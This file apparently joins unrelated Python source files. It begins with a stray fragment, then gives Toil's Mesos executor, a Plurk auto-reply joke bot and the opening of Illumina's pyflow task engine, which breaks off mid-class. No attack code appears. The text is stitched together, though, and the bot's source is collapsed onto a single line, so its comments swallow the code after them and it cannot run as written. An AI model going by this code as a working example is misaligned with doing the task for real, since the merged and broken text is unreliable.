    computation = model_fn(image_laid_out, label_laid_out)
    return computation
executor.py
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import

import os
import random
import socket
import signal
import sys
import threading
import pickle
import logging
import subprocess
import traceback
from time import sleep, time

import psutil
import mesos.interface
from bd2k.util.expando import Expando
from mesos.interface import mesos_pb2
import mesos.native
from struct import pack

from toil.batchSystems.abstractBatchSystem import BatchSystemSupport
from toil.resource import Resource

log = logging.getLogger(__name__)


class MesosExecutor(mesos.interface.Executor):
    """
    Part of Toil's Mesos framework, runs on a Mesos slave. A Toil job is passed to it via the
    task.data field, and launched via call(toil.command).
    """

    def __init__(self):
        super(MesosExecutor, self).__init__()
        self.popenLock = threading.Lock()
        # Maps task id string -> (worker process pid, job store ID).
        self.runningTasks = {}
        self.workerCleanupInfo = None
        Resource.prepareSystem()
        self.address = None
        # Setting this value at this point will ensure that the toil workflow directory will go to
        # the mesos sandbox if the user hasn't specified --workDir on the command line.
        if not os.getenv('TOIL_WORKDIR'):
            os.environ['TOIL_WORKDIR'] = os.getcwd()

    def registered(self, driver, executorInfo, frameworkInfo, slaveInfo):
        """
        Invoked once the executor driver has been able to successfully connect with Mesos.
        """
        log.debug("Registered with framework")
        self.address = socket.gethostbyname(slaveInfo.hostname)
        # Periodically report node load to the leader; daemonized so it never
        # blocks executor shutdown.
        nodeInfoThread = threading.Thread(target=self._sendFrameworkMessage, args=[driver])
        nodeInfoThread.daemon = True
        nodeInfoThread.start()

    def reregistered(self, driver, slaveInfo):
        """
        Invoked when the executor re-registers with a restarted slave.
        """
        log.debug("Re-registered")

    def disconnected(self, driver):
        """
        Invoked when the executor becomes "disconnected" from the slave (e.g., the slave is being
        restarted due to an upgrade).
        """
        log.critical("Disconnected from slave")

    def killTask(self, driver, taskId):
        """
        Kill parent task process and all its spawned children.

        :param taskId: either a mesos_pb2.TaskID message (as delivered by the Mesos driver) or a
               plain task-id string (as used internally by shutdown()).
        """
        # The Mesos driver passes a TaskID protobuf, while shutdown() passes the raw string keys
        # of self.runningTasks (which launchTask populates with task.task_id.value). Normalize to
        # the string form so both callers work.
        key = taskId.value if hasattr(taskId, 'value') else taskId
        try:
            pid, job_id = self.runningTasks[key]
        except KeyError:
            # The task already finished; runTask removes completed tasks concurrently.
            log.debug("Cannot kill unknown or already-finished task %s", key)
            return
        # Kill any docker instances launched by current task
        if self.workerCleanupInfo is not None:
            workflow_id = self.workerCleanupInfo.workflowID
            docker_stop_command = "docker stop `docker ps -q -f label=job_id={} -f label=workflow_id={}`".format(
                job_id, workflow_id)
            p = subprocess.Popen(docker_stop_command, shell=True)
            if p.wait() != 0:
                log.debug("Couldn't kill docker container with job_id {}, workflow_id: {}".format(job_id,
                                                                                                  workflow_id))
            else:
                docker_rm_command = "docker rm `docker ps -q -a -f label=job_id={} -f label=workflow_id={}`".format(
                    job_id, workflow_id)
                p = subprocess.Popen(docker_rm_command, shell=True)
                p.wait()
        try:
            pgid = os.getpgid(pid)
        except OSError:
            # Fixed: os.getpgid raises OSError (ProcessLookupError on Python 3) when the process
            # is already gone -- the previous `except KeyError` never matched, so a dead pid
            # crashed the executor instead of being ignored.
            pass
        else:
            # The worker was started in its own process group (see runJob), so killing the group
            # also reaps any children it spawned.
            os.killpg(pgid, signal.SIGKILL)

    def shutdown(self, driver):
        log.critical('Shutting down executor ...')
        # Snapshot the keys: runTask threads delete entries concurrently, and mutating a dict
        # while iterating over it raises RuntimeError on Python 3.
        for taskId in list(self.runningTasks.keys()):
            self.killTask(driver, taskId)
        Resource.cleanSystem()
        BatchSystemSupport.workerCleanup(self.workerCleanupInfo)
        log.critical('... executor shut down.')

    def error(self, driver, message):
        """
        Invoked when a fatal error has occurred with the executor and/or executor driver.
        """
        log.critical("FATAL ERROR: " + message)

    def _sendFrameworkMessage(self, driver):
        """
        Loop forever, periodically sending node load info to the Mesos leader. Runs in a daemon
        thread started by registered().
        """
        message = None
        while True:
            # The psutil documentation recommends that we ignore the value returned by the first
            # invocation of cpu_percent(). However, we do want to send a sign of life early after
            # starting (e.g. to unblock the provisioner waiting for an instance to come up) so
            # the first message we send omits the load info.
            if message is None:
                message = Expando(address=self.address)
                psutil.cpu_percent()
            else:
                message.nodeInfo = dict(coresUsed=float(psutil.cpu_percent()) * .01,
                                        memoryUsed=float(psutil.virtual_memory().percent) * .01,
                                        coresTotal=psutil.cpu_count(),
                                        memoryTotal=psutil.virtual_memory().total,
                                        workers=len(self.runningTasks))
            driver.sendFrameworkMessage(repr(message))
            # Prevent workers launched together from repeatedly hitting the leader at the same time
            sleep(random.randint(45, 75))

    def launchTask(self, driver, task):
        """
        Invoked by SchedulerDriver when a Mesos task should be launched by this executor
        """

        def runTask():
            """Unpickle the Toil job from task.data, run it as a subprocess and report status."""
            log.debug("Running task %s", task.task_id.value)
            sendUpdate(mesos_pb2.TASK_RUNNING)
            try:
                taskData = pickle.loads(task.data)
            except Exception:
                # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate.
                exc_info = sys.exc_info()
                log.error('Exception while unpickling task:', exc_info=exc_info)
                exc_type, exc_value, exc_trace = exc_info
                sendUpdate(mesos_pb2.TASK_FAILED, wallTime=None,
                           message=''.join(traceback.format_exception_only(exc_type, exc_value)))
                return
            # This is where task.data is first invoked. Using this position to setup cleanupInfo
            if self.workerCleanupInfo is not None:
                assert self.workerCleanupInfo == taskData.workerCleanupInfo
            else:
                self.workerCleanupInfo = taskData.workerCleanupInfo
            startTime = time()
            try:
                popen = runJob(taskData)
                self.runningTasks[task.task_id.value] = (popen.pid, taskData.jobStoreID)
                try:
                    exitStatus = popen.wait()
                    wallTime = time() - startTime
                    if 0 == exitStatus:
                        sendUpdate(mesos_pb2.TASK_FINISHED, wallTime)
                    elif -9 == exitStatus:
                        # Negative exit status means killed by signal; -9 is SIGKILL (killTask).
                        sendUpdate(mesos_pb2.TASK_KILLED, wallTime)
                    else:
                        sendUpdate(mesos_pb2.TASK_FAILED, wallTime, message=str(exitStatus))
                finally:
                    del self.runningTasks[task.task_id.value]
            except Exception:
                wallTime = time() - startTime
                exc_info = sys.exc_info()
                log.error('Exception while running task:', exc_info=exc_info)
                exc_type, exc_value, exc_trace = exc_info
                sendUpdate(mesos_pb2.TASK_FAILED, wallTime,
                           message=''.join(traceback.format_exception_only(exc_type, exc_value)))

        def runJob(job):
            """
            Start the job's command as a subprocess in its own process group.

            :type job: toil.batchSystems.mesos.ToilJob
            :rtype: subprocess.Popen
            """
            if job.userScript:
                job.userScript.register()
            log.debug("Invoking command: '%s'", job.command)
            with self.popenLock:
                # setpgrp puts the worker in its own process group so killTask can SIGKILL the
                # whole tree via os.killpg.
                return subprocess.Popen(job.command,
                                        preexec_fn=lambda: os.setpgrp(),
                                        shell=True,
                                        env=dict(os.environ, **job.environment))

        def sendUpdate(taskState, wallTime=None, message=''):
            """Send a TaskStatus update to Mesos; wallTime (if given) rides in status.data."""
            log.debug('Sending task status update ...')
            status = mesos_pb2.TaskStatus()
            status.task_id.value = task.task_id.value
            status.message = message
            status.state = taskState
            if wallTime is not None:
                status.data = pack('d', wallTime)
            driver.sendStatusUpdate(status)
            log.debug('... done sending task status update.')

        thread = threading.Thread(target=runTask)
        thread.start()

    def frameworkMessage(self, driver, message):
        """
        Invoked when a framework message has arrived for this executor.
        """
        log.debug("Received message from framework: {}".format(message))


def main(executorClass=MesosExecutor):
    """Entry point: run the Mesos executor driver until it stops, then exit the process."""
    logging.basicConfig(level=logging.DEBUG)
    log.debug("Starting executor")
    executor = executorClass()
    driver = mesos.native.MesosExecutorDriver(executor)
    exit_value = 0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1
    assert len(executor.runningTasks) == 0
    sys.exit(exit_value)
main.py
#!/usr/bin/env pipenv run python """ Nonsense plurk bot Distributed under terms of the WTFPL license. """ from poaurk import PlurkAPI from multiprocessing import Process, Value import typing import requests import json import re import loguru import datetime import time import random import schedule import sqlite3 class Bot: def __init__(self, token_file, database): self.main_flag = True self.offset = 0 self.database = database self.plurk = PlurkAPI.fromfile(token_file) status, user_channel = self.plurk.callAPI("/APP/Realtime/getUserChannel") if status: self.comet_server_url = user_channel["comet_server"] self.comet_server_url = self.comet_server_url.split('?')[0].split('#')[0] self.channel_name = user_channel["channel_name"] self.offset = 0 loguru.logger.info(f"Start pulling from comet server: {self.comet_server_url}, channel: {self.channel_name}") else: loguru.logger.error("Get comet channel failed") return con = sqlite3.connect(self.database) cur = con.cursor() cur.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='users' ''') #if the count is 1, then table exists if cur.fetchone()[0]==1: loguru.logger.info("Table exists.") else: #create table cur.execute('''CREATE TABLE IF NOT EXISTS users (id real)''') loguru.logger.info("Table not exists, create one.") con.commit() con.close() def add_user(self, id): if self.if_user(id): # If already in return False con = sqlite3.connect(self.database) cur = con.cursor() insert_with_param = """INSERT INTO users (id) VALUES (?);""" data_tuple = (id, ) cur.execute(insert_with_param, data_tuple) con.commit() con.close() return True def remove_user(self, id): if not self.if_user(id): # If not in return False con = sqlite3.connect(self.database) cur = con.cursor() cur.execute("DELETE FROM users WHERE id=?;", (id,)) con.commit() con.close() return True def if_user(self, id): result = False con = sqlite3.connect(self.database) cur = con.cursor() cur.execute("SELECT count(id) FROM users WHERE id=?;", 
(id,)) if cur.fetchone()[0] >= 1: result = True con.close() return result def is_friend(self, id): opt = { 'user_id': id } status, resp = self.plurk.callAPI("/APP/Profile/getPublicProfile", options=opt) if not status: loguru.logger.error(resp) return None return resp["are_friends"] def base36encode(self, number, alphabet='0123456789abcdefghijklmnopqrstuvwxyz'): """Converts an integer to a base36 string.""" if not isinstance(number, int): raise TypeError('number must be an integer') base36 = '' sign = '' if number < 0: sign = '-' number = -number if 0 <= number < len(alphabet): return sign + alphabet[number] while number != 0: number, i = divmod(number, len(alphabet)) base36 = alphabet[i] + base36 return sign + base36 def gen_msg(self): wara_imgs = [ "https://i.imgur.com/3G7rJ06.jpg", "https://i.imgur.com/641fRAZ.jpg", "https://images.plurk.com/4Wr1If26wnRKEZIllQVIzO.jpg", "https://images.plurk.com/2OkhSDoYeOsQGdvb5KM9Pn.jpg", "https://images.plurk.com/3czlRTuYeTYqCj5vicDQBq.png", "https://images.plurk.com/1M3oSnXNOMVxnOose7Wh8v.jpg", "https://images.plurk.com/1NiFD84tWntjhd65rqpofb.png", "https://images.plurk.com/3A9xyxub8URuxPUkv83Dnr.jpg", "https://images.plurk.com/5d1XD5HZ2AwNzrOtnpQt55.jpg", "https://images.plurk.com/tvs6tIDqFOlXQz8ctqyVO.png", "https://images.plurk.com/sWJm5E69kECFZXaOuOil5.jpg", "https://images.plurk.com/2dyrBaeTXMPaFHZIGM38nc.jpg", "https://images.plurk.com/2r7SHhlXE6wevIRTkAShDB.jpg", "https://images.plurk.com/37E5uFu1po0gijbDhMXNns.jpg", "https://images.plurk.com/2Xe3MqVire3OBI86q9NiTm.jpg", "https://images.plurk.com/4OdjjlnhEf0Q6Sl16b0Qpe.jpg", "https://images.plurk.com/2DsYS1rTQQpEnHYuIGRrlM.jpg", "https://images.plurk.com/63h9OSIKfXU0xMdqUcYbug.gif", "https://images.plurk.com/5K7Cfwcvf1KLbuDiNLowfX.gif", "https://images.plurk.com/4I499E93XC217BKyyrbfxs.jpg", "https://images.plurk.com/45aC4lP3VHMtxbJcmCvn7p.gif", "https://images.plurk.com/3D6GtdgKVtdXI85rkpv2gF.jpg", "https://images.plurk.com/1boeK01koxCaHKp61bNZE7.jpg", 
"https://images.plurk.com/6fyOZT8o4XRFjRsUYhdDPx.jpg", "https://images.plurk.com/7bHAJhlYJLKiRtIdE5cAIg.gif", "https://images.plurk.com/7qfy5z0gIhssOS0tXPccLb.jpg", "https://images.plurk.com/4CvNeGzN8VuSWDa6fdChCA.gif", "https://images.plurk.com/6E7j8fqvN4RqGcMP0W8RD4.gif", "https://images.plurk.com/6PEEClMbQe34JVhGDrP56A.jpg", "https://images.plurk.com/59YJKOGWSSVK0txkTRm5Ns.jpg", "https://images.plurk.com/2KirBTzaFncKxmbWpksyHM.jpg", "https://images.plurk.com/K19HiFh8FfJ6ikvkGpNkt.jpg", "https://images.plurk.com/6ArFHTvOVCho1ACPV1xWUM.jpg", "https://images.plurk.com/7vQkaO6QDEsiCi2pdXYNBu.jpg", "https://images.plurk.com/4zXWw4Ox7T4Jy1pipddhwF.jpg", "https://images.plurk.com/4wE1pgyKoy6q80CAtqYKcV.jpg", "https://images.plurk.com/ViZe8EY8Fov7FTWzaD9rG.jpg", "https://images.plurk.com/yHMyyfUQmuHzdCR3XefFC.jpg", "https://images.plurk.com/46bzj1vbQOjyqtTVsvhKDj.jpg", "https://images.plurk.com/7uBif82MSdV9wlwvEKNd0M.jpg", "https://images.plurk.com/3aDEp8slhs78INml84qYmR.gif", "https://images.plurk.com/2pHGirk3j8vHCTsfJPvjsE.gif", "https://images.plurk.com/47LY6qQBbGjTrQDs1fnWvo.jpg", "https://images.plurk.com/5VDnGFc25D5WubtOuuGQLs.gif", "https://images.plurk.com/1I9bt5RNjdtf8eKuskSdco.gif", "https://images.plurk.com/5p0orzgQw0eZBSrrnfVvk8.jpg", "https://images.plurk.com/1LBwMqxj15mNDrInv9x09f.jpg", "https://images.plurk.com/44ift3DX1eKGITeU1gxzKo.jpg", "https://images.plurk.com/1WjLQvgqaEhEptA3GOLtxe.png", "https://images.plurk.com/4NI5j9G032Ej94pKz2DVdr.gif", "https://images.plurk.com/1fMhrVMAcEheOe8aKYUPMG.jpg", "https://images.plurk.com/6i9p8fq1IOPaASKwFlLBEw.jpg", "https://images.plurk.com/N9ny55giShpK052P7TU8U.jpg", "https://images.plurk.com/1SR9y2XF4N5BJv19sBsh4c.jpg", "https://images.plurk.com/274nBeksho0DwJO7Py1dAX.png", "https://images.plurk.com/qlzv3DXyXbdc6VcA8Zhpa.gif", "https://images.plurk.com/3fIHpkJX0Wfxob2afGzldg.jpg", "https://images.plurk.com/6j82CzcV84CNDFr11nk33o.gif", "https://images.plurk.com/34UeK1zvIMXufXCcWBZIme.gif", 
"https://images.plurk.com/2yVZq4IqvV4mNkKUNKR3MT.jpg", "https://images.plurk.com/6huuRnQ823CP75Zh35GfiN.gif", "https://images.plurk.com/QYkMFAmkjnIO5of5xjZRk.jpg", "https://images.plurk.com/3mSpHWBu550r2rdKl0wk0c.gif", "https://images.plurk.com/5FXj7gQ3SaVhd7xbIG4sP7.gif" ] rand_num = random.randint(1, 100) if rand_num <= 3: return '草' elif rand_num <= 10: return random.choice(wara_imgs) + ' \n笑死' elif rand_num <= 20: return '哭啊' else: return '笑死' def refresh_channel(self): self.plurk.callAPI("/APP/Realtime/getUserChannel") self.offset = 0 loguru.logger.info("Refresh comet channel") def comet_main(self, watchdog): while self.main_flag: q = { 'channel': self.channel_name, 'offset': self.offset } try: resp = requests.get(self.comet_server_url, params=q, timeout=60) resp.raise_for_status() except requests.exceptions.HTTPError as errh: loguru.logger.error(f"Http Error: {errh}") continue except requests.exceptions.ConnectionError as errc: loguru.logger.error(f"Error Connecting: {errc}") continue except requests.exceptions.Timeout as errt: loguru.logger.error(f"Timeout Error: {errt}") continue except requests.exceptions.RequestException as err: loguru.logger.error(f"Request Other Error: {err}") continue loguru.logger.debug(f"Request url: {resp.url}") comet_content = resp.text m = re.search(r'CometChannel.scriptCallback\((.*)\);', comet_content) try: json_content = json.loads(m.group(1)) except Exception as err: loguru.logger.error(f"Json Error: {err}") try: if "data" in json_content: self.comet_callBack(json_content["data"]) except Exception as err: loguru.logger.error(f"Callback Error: {err}") try: if "new_offset" in json_content: self.offset = json_content["new_offset"] # loguru.logger.debug(f"Update Offset: {self.offset}") if self.offset<0: loguru.logger.error(f"Offset Error: {offset}") self.refresh_channel() except Exception as err: loguru.logger.error(f"Offset Error: {err}") watchdog.value = 1 def comet_callBack(self, data): for d in data: if 'type' not in d: 
loguru.logger.warning(json.dumps(d)) continue if d['type'] == 'new_plurk': if not self.is_friend(d["user_id"]): # Not friend, jump continue if "不好笑" in d["content"]: res = self.add_user(d["user_id"]) if res: loguru.logger.info("Stop user " + str(d["user_id"])) elif "好笑嗎" in d["content"]: res = self.remove_user(d["user_id"]) if res: loguru.logger.info("Reset user " + str(d["user_id"])) if self.if_user(d["user_id"]): continue else: opt = { 'plurk_id': d['plurk_id'], 'qualifier': ':', 'content': self.gen_msg() } plurk_id_base36 = self.base36encode(opt['plurk_id']) loguru.logger.info(f"Response to https://www.plurk.com/p/{plurk_id_base36}") self.plurk.callAPI("/APP/Responses/responseAdd", options=opt) def routine_main(self, watchdog): def add_all_friends(): self.plurk.callAPI("/APP/Alerts/addAllAsFriends") def knock_comet(): knock_comet_url = "https://www.plurk.com/_comet/generic" p = { 'channel': self.channel_name } try: resp = requests.get(knock_comet_url, params=p, timeout=60) resp.raise_for_status() except requests.exceptions.HTTPError as errh: loguru.logger.error(f"Http Error: {errh}") return except requests.exceptions.ConnectionError as errc: loguru.logger.error(f"Error Connecting: {errc}") return except requests.exceptions.Timeout as errt: loguru.logger.error(f"Timeout Error: {errt}") return except requests.exceptions.RequestException as err: loguru.logger.error(f"Request Other Error: {err}") return except Exception as err: loguru.logger.error(f"Other Error: {err}") return loguru.logger.debug(f"Request url: {resp.url}") def watch_dog(): if not watchdog.value: loguru.logger.error("No response") return loguru.logger.debug("Running...") watchdog.value = 0 schedule.every(5).seconds.do(add_all_friends) schedule.every(1).minutes.do(knock_comet) schedule.every(10).minutes.do(watch_dog) while self.main_flag: try: schedule.run_pending() except Exception as err: loguru.logger.error(f"Schedule Task Error: {err}") time.sleep(1) def main(self): watchdog_flag = Value('i', 1) 
try: comet_proc = Process(target=self.comet_main, args=(watchdog_flag,), daemon=True) routine_proc = Process(target=self.routine_main, args=(watchdog_flag,), daemon=True) comet_proc.start() routine_proc.start() while True: time.sleep(100) loguru.logger.debug(f"Running... Comet: {comet_proc.is_alive()}, Routine: {routine_proc.is_alive()}") except (KeyboardInterrupt, SystemExit): comet_proc.terminate() routine_proc.terminate() loguru.logger.info("Stop bot.") if __name__=="__main__": loguru.logger.add( # f'data/{datetime.date.today():%Y%m%d}.log', 'data/{time}.log', rotation='1 day', retention='7 days', enqueue=True, # level='INFO') level='DEBUG') bot = Bot("token.txt", "data/users.db") bot.main()
pyflow.py
#!/usr/bin/env python
#
# pyFlow - a lightweight parallel task engine
#
# Copyright (c) 2012-2017 Illumina, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materials provided with the
#    distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
# WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#

"""
pyflow -- a lightweight parallel task engine
"""

__author__ = 'Christopher Saunders'


import copy
import datetime
import os
import re
import shutil
import subprocess
import sys
import threading
import time
import traceback

from pyflow.pyflowConfig import siteConfig


moduleDir = os.path.abspath(os.path.dirname(__file__))


# minimum python version
#
pyver = sys.version_info
# NOTE: the second clause of the original test redundantly re-checked
# pyver[0] == 3; the simplified condition rejects exactly the same versions:
if pyver[0] != 3 or pyver[1] < 6 :
    raise Exception("pyflow module has only been tested for python versions [3.7, 3.6]")

# In python 2.5 or greater, we can lower the per-thread stack size to
# improve memory consumption when a very large number of jobs are
# run. Below it is lowered to 256Kb (compare to linux default of
# 8Mb).
#
threading.stack_size(min(256 * 1024, threading.stack_size()))


class GlobalSync :
    """
    Control total memory usage in non-local run modes by
    limiting the number of simultaneous subprocess calls

    Note that in practice this only controls the total number
    of qsub/qstat calls in SGE mode
    """
    maxSubprocess = 2

    subprocessControl = threading.Semaphore(maxSubprocess)


def getPythonVersion() :
    """
    Return the full interpreter version tuple as a dotted string,
    e.g. '3.8.10.final.0'
    """
    python_version = sys.version_info
    return ".".join([str(i) for i in python_version])

pythonVersion = getPythonVersion()


# Get pyflow version number
#
def getPyflowVersion() :
    """
    Return the pyflow version string, either macro-ed in at release
    time, derived from 'git describe' during development, or 'unknown'
    """
    # this will be automatically macro-ed in for pyflow releases:
    pyflowAutoVersion = None

    # Get version number in regular release code:
    if pyflowAutoVersion is not None : return pyflowAutoVersion

    # Get version number during dev:
    try :
        # route stderr to subprocess.DEVNULL -- the previous
        # open(os.devnull, "w") leaked an unclosed file handle per call:
        proc = subprocess.Popen(["git", "describe"],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.DEVNULL,
                                cwd=moduleDir,
                                shell=False)
        (stdout, _stderr) = proc.communicate()
        stdout = stdout.decode('utf-8')
        retval = proc.wait()
        stdoutList = stdout.split("\n")[:-1]
        if (retval == 0) and (len(stdoutList) == 1) : return stdoutList[0]
    except OSError:
        # no git installed
        pass

    return "unknown"


__version__ = getPyflowVersion()


# portability functions:
#
def _isWindows() :
    import platform
    return (platform.system().find("Windows") > -1)

class GlobalConstants :
    # cache the platform probe once at import time:
    isWindows=_isWindows()

def isWindows() :
    return GlobalConstants.isWindows


def forceRename(src,dst) :
    """
    dst is only overwritten in a single atomic operation on *nix
    on windows, we can't have atomic rename, but we can recreate the behavior otherwise
    """
    if isWindows() :
        if os.path.exists(dst) :
            os.remove(dst)

    maxTrials=5
    for trial in range(maxTrials) :
        try :
            os.rename(src,dst)
            return
        except OSError :
            if (trial+1) >= maxTrials : raise
            time.sleep(5)


def cleanEnv() :
    """
    clear bash functions out of the env

    without this change the shellshock security update causes pyflow
    SGE jobs to fail with the behavior of current (201512) versions of
    SGE qsub
    """
    ekeys = list(os.environ.keys())
    for key in ekeys :
        if key.endswith("()") :
            del os.environ[key]


# utility values and functions:
#

def ensureDir(d):
    """
    make directory if it doesn't already exist, raise exception if
    something else is in the way:
    """
    if os.path.exists(d):
        if not os.path.isdir(d) :
            raise Exception("Can't create directory: %s" % (d))
    else :
        os.makedirs(d)


#
# time functions -- note there's an additional copy in the pyflow wrapper script:
#
# all times in pyflow are utc (never local) and printed to iso8601
#
def timeStampToTimeStr(ts) :
    """
    converts time.time() output to timenow() string
    """
    return datetime.datetime.utcfromtimestamp(ts).isoformat()

def timeStrNow():
    """Return the current UTC time as an iso8601 string."""
    return timeStampToTimeStr(time.time())

def timeStrToTimeStamp(ts):
    """Convert an iso8601 string back to an epoch timestamp (UTC)."""
    import calendar
    d = datetime.datetime(*list(map(int, re.split(r'[^\d]', ts)[:-1])))
    return calendar.timegm(d.timetuple())


def isInt(x) :
    return isinstance(x, int)

def isString(x):
    return isinstance(x, str)


def isIterable(x):
    return (getattr(x, '__iter__', False) != False)


def lister(x):
    """
    Convert input into a list, whether it's already iterable or
    not. Make an exception for individual strings to be returned
    as a list of one string, instead of being chopped into letters
    Also, convert None type to empty list:
    """
    # special handling in case a single string is given:
    if x is None : return []
    if (isString(x) or (not isIterable(x))) : return [x]
    return list(x)


def setzer(x) :
    """
    convert user input into a set, handling the pathological case
    that you have been handed a single string, and you don't want
    a set of letters:
    """
    return set(lister(x))


class LogState :
    """
    A simple logging enum
    """
    INFO = 1
    WARNING = 2
    ERROR = 3

    @classmethod
    def toString(cls,logState) :
        if logState == cls.INFO : return "INFO"
        if logState == cls.WARNING : return "WARNING"
        if logState == cls.ERROR : return "ERROR"

        raise Exception("Unknown log state: " + str(logState))


# allow fsync to be globally turned off
class LogGlobals :
    isFsync = True


def hardFlush(ofp):
    """
    Flush a file object through to disk (fsync) where possible.
    """
    ofp.flush()
    if ofp.isatty() : return
    # fsync call has been reported to consistently fail in some contexts (rsh?)
    # so allow OSError
    if not LogGlobals.isFsync : return
    try :
        os.fsync(ofp.fileno())
    except OSError:
        # once fsync fails, disable it globally rather than failing every call:
        LogGlobals.isFsync = False


def log(ofpList, msgList, linePrefix=None):
    """
    General logging function.

    @param ofpList: A container of file objects to write to

    @param msgList: A container of (or a single) multi-line log message
                    string. Final newlines are not required

    @param linePrefix: A prefix to add before every line. This will come
                      *after* the log function's own '[time] [hostname]'
                      prefix.

    @return: Returns a boolean tuple of size ofpList indicating the success of
              writing to each file object
    """
    msgList = lister(msgList)
    ofpList = setzer(ofpList)
    retval = [True] * len(ofpList)
    for msg in msgList :
        # strip final trailing newline if it exists:
        if (len(msg) > 0) and (msg[-1] == "\n") : msg = msg[:-1]
        linePrefixOut = "[%s] [%s]" % (timeStrNow(), siteConfig.getHostName())
        if linePrefix is not None : linePrefixOut += " " + linePrefix
        # split message into prefixable lines:
        for i, ofp in enumerate(ofpList):
            # skip io streams which have failed before:
            if not retval[i] : continue
            try :
                for line in msg.split("\n") :
                    ofp.write("%s %s\n" % (linePrefixOut, line))
                hardFlush(ofp)
            except IOError:
                retval[i] = False
    return retval


def getThreadName():
    # threading.currentThread().getName() is deprecated in modern python;
    # current_thread().name is the equivalent supported spelling:
    return threading.current_thread().name

def isMainThread() :
    # FIX: the original compared the *function object* getThreadName to a
    # string, which always evaluated False. The function must be called:
    return (getThreadName() == "MainThread")


class StrFileObject(object) :
    """
    fakes a filehandle for library functions which write to a stream,
    and captures output in a string
    """
    def __init__(self) :
        self.str = ""

    def write(self, string) :
        self.str += string

    def __str__(self) :
        return self.str


def getTracebackStr() :
    return traceback.format_exc()


def getExceptionMsg() :
    """
    Return the current exception's message plus stack trace as a list of
    lines, labeled with the reporting thread's name.
    """
    msg = ("Unhandled Exception in %s\n" % (getThreadName())) + getTracebackStr()
    if msg[-1] == "\n" : msg = msg[:-1]
    return msg.split("\n")


def cmdline() :
    return " ".join(sys.argv)


def msgListToMsg(msgList):
    """
    convert string or list of strings into a single string message
    """
    msg = ""
    isFirst=True
    for chunk in lister(msgList) :
        if isFirst :
            isFirst = False
        else :
            msg += "\n"
        if ((len(chunk)>0) and (chunk[-1] == '\n')) :
            chunk = chunk[:-1]
        msg += chunk

    return msg


emailRegex = re.compile(r"(?:^|\s)[-a-z0-9_.]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}(?:\s|$)", re.IGNORECASE)

def verifyEmailAddy(x) :
    return (emailRegex.match(x) is not None)


def isLocalSmtp() :
    """
    return true if a local smtp server is available
    """
    import smtplib
    try :
        s = smtplib.SMTP('localhost')
    except Exception :
        # any connection failure means no usable local server:
        return False
    return True


def sendEmail(mailTo, mailFrom, subject, msgList) :
    """
    Send msgList (a string or list of strings) via the local smtp server.

    @param mailTo: one or more destination addresses
    @param mailFrom: sender address
    @param subject: message subject line
    @param msgList: message body string, or container of strings
    """
    import smtplib
    # this is the way to import MIMEText in py 2.4:
    from email.mime.text import MIMEText

    # format message list into a single string:
    msg = msgListToMsg(msgList)

    mailTo = setzer(mailTo)

    msg = MIMEText(msg)
    msg["Subject"] = subject
    msg["From"] = mailFrom
    msg["To"] = ", ".join(mailTo)

    s = smtplib.SMTP('localhost')
    s.sendmail(mailFrom, list(mailTo), msg.as_string())
    s.quit()


def boolToStr(b) :
    return str(int(b))


def argToBool(x) :
    """
    convert argument of unknown type to a bool:
    """
    class FalseStrings :
        val = ("", "0", "false", "f", "no", "n", "off")

    if isinstance(x, str) :
        return (x.lower() not in FalseStrings.val)
    return bool(x)


def hashObjectValue(obj) :
    """
    This function hashes objects values -- the hash will be the same
    for two objects containing the same methods and data, so it
    corresponds to 'A==B' and *not* 'A is B'.
    """
    import pickle
    import hashlib
    # FIX: the original computed the digest but never returned it, so the
    # function always returned None:
    return hashlib.md5(pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)).hexdigest()


namespaceSep = "+"


def namespaceJoin(a, b) :
    """
    join two strings with a separator only if a exists
    """
    if a == "" : return b
    elif b == "" : return a
    return a + namespaceSep + b


def namespaceTypeLabel(namespace) :
    """
    Provide a consistent naming scheme to users for embedded workflows
    """
    if namespace == "" :
        return "master workflow"
    else :
        return "sub-workflow"

def namespaceLabel(namespace) :
    """
    Provide a consistent naming scheme to users for embedded workflows
    """
    if namespace == "" :
        return "master workflow"
    else :
        return "sub-workflow '%s'" % (namespace)


class ExpWaiter(object) :
    """
    Convenience object to setup exponentially increasing wait/polling times
    """
    def __init__(self, startSec, factor, maxSec, event = None) :
        """
        optionally allow an event to interrupt wait cycle
        """
        assert (startSec > 0.)
        assert (factor > 1.)
        assert (maxSec >= startSec)
        self.startSec = startSec
        self.factor = factor
        self.maxSec = maxSec
        self.event = event

